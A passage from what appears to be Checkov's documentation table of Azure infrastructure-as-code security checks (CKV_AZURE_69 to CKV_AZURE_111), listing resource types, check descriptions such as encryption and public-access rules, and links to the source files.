[PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | +| 1766 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | 
[AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | +| 1767 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1768 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1769 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1770 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1771 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1772 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1773 | CKV_AZURE_71 | resource | 
Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | arm | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 1774 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | Bicep | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 1775 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1776 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1777 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1778 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | arm | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 1779 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | Bicep | 
[AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 1780 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1781 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1782 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1783 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | arm | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 1784 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | Bicep | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 1785 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1786 | CKV_AZURE_73 | resource | 
azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1787 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1788 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1789 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | arm | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 1790 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Bicep | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 1791 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | +| 1792 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | +| 1793 | 
CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | arm | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1794 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | Bicep | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1795 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1796 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1797 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1798 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1799 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | 
[AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1800 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1801 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | +| 1802 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 1803 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 1804 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1805 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1806 
| CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | +| 1807 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | arm | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 1808 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | Bicep | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 1809 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | +| 1810 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | arm | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 1811 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | Bicep | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 1812 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | +| 1813 | CKV_AZURE_84 | resource | 
Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | arm | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 1814 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | Bicep | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 1815 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | +| 1816 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | +| 1817 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | +| 1818 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | +| 1819 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 1820 | CKV_AZURE_88 | 
resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 1821 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1822 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1823 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1824 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 1825 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 1826 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | +| 1827 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure 
that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | +| 1828 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1829 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1830 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 1831 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 1832 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | +| 1833 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | 
[MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 1834 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 1835 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1836 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1837 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1838 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1839 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1840 | 
CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 1841 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 1842 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | +| 1843 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1844 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1845 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1846 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | 
[VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1847 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1848 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1849 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | +| 1850 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | +| 1851 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 1852 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 1853 | 
CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | +| 1854 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | +| 1855 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | +| 1856 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) | +| 1857 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) | +| 1858 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | +| 1859 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | 
[DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | +| 1860 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) | +| 1861 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) | +| 1862 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) | +| 1863 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) | +| 1864 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | +| 1865 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | +| 1866 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API 
management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) | +| 1867 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | +| 1868 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | +| 1869 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | +| 1870 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | +| 1871 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | +| 1872 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | 